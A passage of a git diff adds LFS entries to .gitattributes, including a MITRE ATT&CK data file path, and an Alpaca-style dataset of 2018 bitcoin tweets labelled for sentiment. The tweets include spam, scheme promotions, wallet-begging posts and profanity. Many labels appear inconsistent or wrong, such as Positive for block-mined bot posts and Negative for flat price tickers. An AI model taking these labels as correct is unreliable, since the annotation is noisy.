diff --git a/.gitattributes b/.gitattributes index c7d9f3332a950355d5a77d85000f05e6f45435ea..ef34f8f9890be7b9bab243364f1db770a694c334 100644 --- a/.gitattributes +++ b/.gitattributes @@ -32,3 +32,5 @@ saved_model/**/* filter=lfs diff=lfs merge=lfs -text *.zip filter=lfs diff=lfs merge=lfs -text *.zst filter=lfs diff=lfs merge=lfs -text *tfevents* filter=lfs diff=lfs merge=lfs -text +alpaca_data_cleaned_archive_origin.json filter=lfs diff=lfs merge=lfs -text +cti-ATT-CK-v13.1/enterprise-attack/enterprise-attack.json filter=lfs diff=lfs merge=lfs -text diff --git a/alpaca-bitcoin-sentiment-dataset.json b/alpaca-bitcoin-sentiment-dataset.json new file mode 100644 index 0000000000000000000000000000000000000000..27bbbc65c369ab8a466e5f53916a427644e573d2 --- /dev/null +++ b/alpaca-bitcoin-sentiment-dataset.json @@ -0,0 +1 @@ +[{"instruction": "Detect the sentiment of the tweet.", "input": "@p0nd3ea Bitcoin wasn't built to live on exchanges.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@historyinflicks Buddy if I had whatever series of 19th diseases Bannon clearly has I'd want to be a bitcoin too.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@eatBCH @Bitcoin @signalapp @myWickr @Samsung @tipprbot patience is truly a virtue", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@aantonop Even if Bitcoin crash tomorrow morning, the technology it\u2019s still revolutionary. A way of simplifying it. #Ihavetobepartofthis", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I am experimenting whether I can live only with bit coins donated. Please cooperate.\n\n3NKbfJuuMKzNMYMcLqCf5w8TgeGvue7A5 ##bitcoin #Donation", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@_Cryptosaur @TradeSatoshi yeah my bitcoin deposit not showing up... lets just hope it eventually does", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\u0e3f value over 1 year: +792.65%, (+$7709.41) [Currently $8682.015] #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Embrace the FUD.\n\nThat means more cheap coins for me and less dumb people in Bitcoin.\n\nI'm playing the long game.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 01:41:52 2018 (0:11)\nUSD : 8712.93\nWght: 0.44\nBlk#: 514742\nSize: 124.4 KB\nTXs: 208\nPool: 68 (0.0 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#YABTCL - #Bitcoin #Lottery\nDraw #701 - Winning Numbers: 03-10-16-18-46-62", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 000000000000000000451731d60b7b0bc228f26b7b946cf3c610d52839d4e61a mined at height 514741.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 00000000000000000045b039632035f328a6dbbc05b69dbf562e103fb46bdf60 mined at height 514742.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Arab88612723 @marcdemesel BitcoinPlus is the real 2nd bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I am playing bitcoin trade, a loss of $ 300,000.\nMy life is over. #bitcoin #givemebitcoin #help\n\n\u3010BTC\u3011\n1PcXbdVubUPmy1xToYyjvho8rS #pleasert", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CryptoShillNye HEY FUCK YOU, TRX IS NEXT BITCOIN BITCH.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@NickSzabo4 Monopoly: Bitcoin Edition would be the least fun board game ever \ud83d\ude02", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "ICE Agency Charges Payza and Two Canadian Citizens With Bitcoin Money Laundering #ico #cryptocurrency #token", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Anybody that knows how to use bitcoin?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CryptoCobain I want to be a big man can u plzzz give me free bitcoin?", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "How do you lead a horse to water? With lots of carrots. #Proverb #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\u201cSBI Bits has invested in more blockchain companies than Google.\u201d-Jerry Chan\n\n#bitcoincash #bitcoin #satoshivision conference", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@GetCoinJar @boostjuiceoz Watermelon, pineapple and strawberries. Sometimes sweet then sour which is how Bitcoin markets are.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@NickSzabo4 I understood Bitcoin consensus from soccer matches without referees yet we played with well set rules", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@FaaipMusic I put 15k in bitcoin last month!", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@SSFCFOTY13 Yesterday I saw a guy with a license plate frame that said \"Bitcoin\" and his plate number was BTC.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@TechnicalCrypto Pretty sure we could have tested bitcoin over the last 10 or so years", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@DrawnActor @nvidia They told me to invest in bitcoin Kappa", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@TalkingHat @stefapie all your Bitcoin are belong to us amirite guys", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "2) whispered.\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@kyletorpey In terms of casual use, dollars are known as bucks- pounds, quid etc. so calling Bitcoin Cash, bcash, isn\u2019t a problem either", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 01:49:23 2018 (7:31)\nUSD : 8694.09\nWght: 0.43\nBlk#: 514743\nSize: 341.1 KB\nTXs: 868\nPool: 69 (0.0 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "My Momma Called Me Asking For 2 Thousand Dollars Off Bitcoin \ud83d\ude02\ud83d\ude02", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8719.42 / 7077.117\u20ac\n1 bitcoin-cash = $1016.99 / 825.439\u20ac\n1 ethereum = $540.051 / 438.332\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Education can train, but cannot create intelligence. #EdwardMcChesneySait #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 0000000000000000002fa5cee2ae556e0353f8090fa0d234a25d94c2bfb3e832 mined at height 514743.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#MAPS has 1 new tx\n(\ud83d\udcc8 input: 0.00115192 BTC / 10.03 USD)\nFinal balance: 0.00115192 BTC / 10.03 USD\n#donation #bitcoin #cryptopaymon \ud83e\udd16\ud83d\uddff\ud83d\udc4d", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@AriseUniverse They probably use #BitCoin too", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Bitcoin Don't kid yourself. The rich will always control to some degree because they have the buying power...", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Thomas1774Paine Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Crypto shopping \ud83d\uded2\ud83d\udecd #crypto #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin cash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@caperthebard @stefapie You can buy ebaum's world merch with bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Billyisgreat123 LOL, obviously your clueless, bitcoin is good, just not as good as it once was", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Crypto #retweet bot. Follow for everything crypto. What to get your content #retweeted follow and DM I want retweet. #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "imagine calling yourself the dude nextdoor screaming about Bitcoin on my timeline yikes", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@NickSzabo4 Every node, not just Trusted 3rd party nodes like some blockchains. Bitcoin is KING! not just a pretender to the thrown.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@kyletorpey I would go with dev, bcash is based on bitcoin code base for a reason", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "ICE Agency Charges Payza and Two Canadian Citizens With Bitcoin Money Laundering #ico #cryptocurrency #token", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@lopp @psycho_sage @naval Would this child understand Bitcoin as trustworthy and use it as peer to peer cash?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Blued0g420 @MisterFarbridge yeah for sure, many things are over priced in this space. #Bitcoin is not one of them however \ud83d\ude0e", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Thanks to my persistence, hard work and constant observation of the markets I could create this FX Robot. #Close #CFD #Bitcoin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "THE MOST INNOVATIVE AND LUCRATIVE WAY TO EARN BITCOIN\nJOIN BITCLUB NETWORK!!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@QTRResearch What\u2019s bitcoin doing though", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Auggie velarde - bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin is still early in the network effects game", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Patatobear I got a bitcoin for yu in tarkov ovo", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Optimal tx fee: 0 satoshi per byte. \nBTC : $8694 / \u20ac7054 / \u00a36161 @ Block 514743. \nMarket Cap: 147.33B USD. #Bitcoin #\u30d3\u30c3\u30c8\u30b3\u30a4\u30f3", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8681.47 #Bitcoin #Bithound", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\u0e3f value over 1 year: +796%, (+$7741.95) [Currently $8714.555] #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@tferriss You mean bitcoin, right? C\u2019mon this is a joke.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Related Instagram tags for #cryptocurrency: #bitcoin #blockchain #crypto #ethereum #btc #litecoin #coinbase #trading #forex #ico #bitcoins", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Market Cap: $335,683,404,227.00\nBitcoin Dominance: 43.99 %\n24H Volume: $14,688,906,280.00\n$BTC #pampit #bogdanoff", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Valores | dolar R$3.3019 | BITCOIN(MCDTBC) R$30499.00000000 | BITCOIN(BLCHAIN) R$28780.52 | LITECOIN(MCDTBC) R$577.10000000", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8704.67", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I respect shitcoin's right to exist.\n\nBecause all y'all ain't nothing more than Bitcoin testnets.\n\nWe will jack all your innovations.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@crypToBanger Bitcoin 2013/2014?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Anyone else ever get that tingly feeling that we're part of something world-changing? #Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bad news: Bitcoin on the decline.\nCurrent Rate: 8680.62 USD = 1 BTC", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ #1, Bitcoin with unit price of $8,721.02, market cap of $147,683,819,562 (44.04%), and 24 hr vol. of $5,484,840,000 (37.48%)", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Mar 22, 2018 06:00PM #Bitcoin Price:\nUSD 8752.51 | EUR 7067.80 | JPY 936418.95", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Two Hour Lull Update: CryptoCompare Bitcoin price: $8664.23 #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Average Bitcoin market price is: USD 8,675.33, EUR 7,046.78", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin:$8721.02\nEthereum:$540.487\nBitcoin Cash:$1017.03\nLitecoin:$163.289\nRipple:$0.657819\nIOTA:$1.33", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current BTC Dominance: 44.01% #Bitcoin #Altcoin #Cryptocurrency", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin - BTC\nPrice: $8,721.02\nChange in 1h: -0.14%\nMarket cap: $147,683,819,562.00\nRanking: 1\n#Bitcoin #BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8721.02 / 7078.415\u20ac\n1 bitcoin-cash = $1017.03 / 825.472\u20ac\n1 ethereum = $540.092 / 438.365\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8721.02 / 7078.415\u20ac\n1 bitcoin-cash = $1017.03 / 825.472\u20ac\n1 ethereum = $540.092 / 438.365\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 #BTC (#Bitcoin) quotes:\n$8650.00/$8652.82 #Bitstamp\n$8620.00/$8632.10 #Kraken\n\u21e2$-32.82/$-17.90\n$8598.93/$8685.36 #Coinbase\n\u21e2$-53.89/$35.36", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Install CryptoTab and mine Bitcoin! httpGet more than 1 BTC per month! Develop the network and get your rewardss://getcryptotab.com/422427", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#XEM Price is 0.00003374 (-0.00000011) #BTC / 0.292824 (-0.00112) #USD. Market rank is 13. #nem #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#ADA Price is 0.00002297 (-0.00000011) #BTC / 0.199412 (-0.00104) #USD. Market rank is 6. #cardano #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#DASH Price is 0.0474768 (-0.00029230) #BTC / 412.08 (-2.72100) #USD. Market rank is 12. #dash #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#SUB Price is 0.00004829 (+0.00000056) #BTC / 0.419721 (+0.00527) #USD. Market rank is 114. #substratum #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#EOS Price is 0.00079116 (-0.00000373) #BTC / 6.86695 (-0.03540) #USD. Market rank is 7. #eos #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC hourly update\n$8689.58 | -0.0032%\ud83d\udcc9\n$BTC #BTCUSD #Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of #Bitcoin is $8650.00", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 02:00:20 2018 (10:57)\nUSD : 8651.21\nWght: 0.43\nBlk#: 514744\nSize: 491.3 KB\nTXs: 1165\nPool: 60 (0.0 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Curious about where $BTC stands? Bitcoin is $8650.00 Enjoy your day. \u2195\ufe0f", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin Price 8650.00 USD via Chain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1,255 increase in MPI over sale of Bitcoin!!!!!!! (from this month over last month) Go! Go! Go!!", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 0000000000000000000ddc396a7ed473727624a4e72287b0d9b45c8c6a1022c5 mined at height 514744.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8650.00 \u201cLike\u201d if thats good for you and \u201cretweet\u201d if thats not good for you #bitcoin #btc #bitcoinprice", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8650.00", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@OTC_Bitcoin Will we see a 6k or lower bitcoin?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8650.00 #BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@freebitco hello i want to win bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin 8650.00 $", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": ".Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@eskintan Thanks for supporting my art and #bitcoin brother!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Broke: Trying to identify and support young promising shitcoins.\n\nWoke: Trying to identify and support young promising Bitcoin talent.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@zerosum0x0 @sundhaug92 \"I hacked Bitcoin using this weird trick!\"", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Enough people agreed that something with no intrinsic value is a tradeable commodity, so now we have President Bitcoin. Is that it?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Really need my crypto to blow up so I can buy a bitcoin gat", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8650.00.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@TronNews_ Do you think trx will ever get rid off Bitcoin and become more steady?", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\"Bitcoin Core is a cult trapped in a world of platonic forms.\" - @DanielKrawisz @Satoshis_Vision Conference", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@GlennDuggan Exactly, I also only pay with bitcoin to avoid a paper trail.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@DepressionEcon And after bitcoin is done pumping. It\u2019ll be our time lol", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin daily looks like a retest of 8k is extremely likely $BTC $CRYPTO", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin is my hedge. With the DJIA down 700+, if the global economy craps the bed in the next 10 years, Bitcoin will Rule...\n#Bitcoin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Hey... here's some TA or whatever... #bitcoin is going to go sideways for FUCKING EVER!!!!!!", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I have 1,000 dollars in bitcoin and not afraid to use it", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC $8721.02 Down -$0.55 -0.01% in the last hour #bitcoin #bitsmart", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I want to learn!!! About Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8691.95 / 7054.821\u20ac\n1 bitcoin-cash = $1014.12 / 823.11\u20ac\n1 ethereum = $537.774 / 436.484\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin BTC Current Price:\n$8.716,300\n1 Hour: -0.15 % | 24 Hours: -3.22 % | 7 Days: 5.95 %\n#btc #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I used #bitcoin to buy headphones yesterday and they're gonna be here on Monday...\nWhat a time to be alive.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Blockchain is the tech. #Bitcoin is merely the first mainstream manifestation of its potential. #freecoins", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "HOY 22/3/18 euro Bs 284.672,70 c.c.t(tranf) Bs 259.622,64\nD.l.r bitcoin Bs258.889,58 today Bs 231.334,02", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Drive Genuine Cryptocurrency bitcoin traffic for ICO for $5: Welcome to the best bitcoin website traffic Want to Get\u2026", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin will be succesful long term if we worship a decentralized system, not a centralized leader.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@_Kevin_Pham how much did you invest to mine Bitcoin, Kevin ?", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CNN sooo what you're saying is only buy #bitcoin that is #madeintheusa", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 02:13:32 2018 (13:12)\nUSD : 8623.96\nWght: 0.43\nBlk#: 514745\nSize: 550.9 KB\nTXs: 1442\nPool: 34 (0.0 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current Bitcoin Price = $9693.62 --- Includes Sum of Forks, Core $8624.00 (88.97%) + Cash $1010.13 (10.42%) + Gold $59.49 (0.61%)", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "please give me\n32yyeXCAqrxbKMvSDP9ymib64wJfB8GUbe\n\n#Ripple\n#Bitcoin\n#help", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 00000000000000000009fb95b43a4042b322c5468c7763368920718708ff65a0 mined at height 514745.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The current price of Bitcoin is $8666.39.\nThe current price of BCash is $1007.41, or 0.116903 BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\"Bitcoin Core don't support creativity of people they don't know\" - @DanielKrawisz at @Satoshis_Vision #satoshisvision #BitcoinCash #bch", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "ICE Agency Charges Payza and Two Canadian Citizens With Bitcoin Money Laundering #ico #cryptocurrency #token #ROX #Robotinaico", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin Cash BCH Current Price:\n$1.010,820\n1 Hour: -0.06 % | 24 Hours: -3.66 % | 7 Days: 8.95 %\n#bch #bitcoin cash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@_Kevin_Pham Trumps retarded policies and actions are about to make bitcoin way more valuable...probably sooner than later.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@pwthornton Bitcoin fans: Fuck the FDIC and big government regulations!\nAlso Bitcoin fans: What the fuck just happened to my money?", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@twobitidiot Same. Gold is seen as a global currency and bitcoin is the new age version of it.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ValoremF a great bonus to pursue. #AdVelorem #Bitcoin #Valorem #Ico", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@pipis @makmummasjid Me ; \nPINTEREST RENEGADE, BRANDING INTERN, BITCOIN CZAR. IGNORING YOUR PASSION IS LIKE DYING A SLOW DEATH.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8648.6 / 7019.636\u20ac\n1 bitcoin-cash = $1012.28 / 821.617\u20ac\n1 ethereum = $534.693 / 433.983\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@tanjrinidad bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@rogerkver @Falkvinge Bitcoin #BCH Leaders \ud83c\udf0e\u270c\ud83c\udffb", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@nlckstephens is bitcoin a woke ally", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "somebody teach me how to use bitcoin so I can get some actual coinT", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@illusionfoxe in fact by mining a bitcoin you actually end up spending a bunch of money. and/or burning your house down. or both.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Celebrate birthday and take interesting prizes with @bethereumteam #bethereum #bitcoin #news #crypto #blockchain #betting #tokensupply #bthr", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Your bet, your rules! This is how says @bethereumteam #bethereum #bitcoin #news #crypto #blockchain #betting #tokensupply #bthr", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Should be buy Tron or not?\n #trx #tron #altcoins #cryptocurrency #ethereum #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@rogerkver @Falkvinge Only diet Bitcoin Cash Lite will be left after all the rubble of Vers massive poop dumps is through.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", 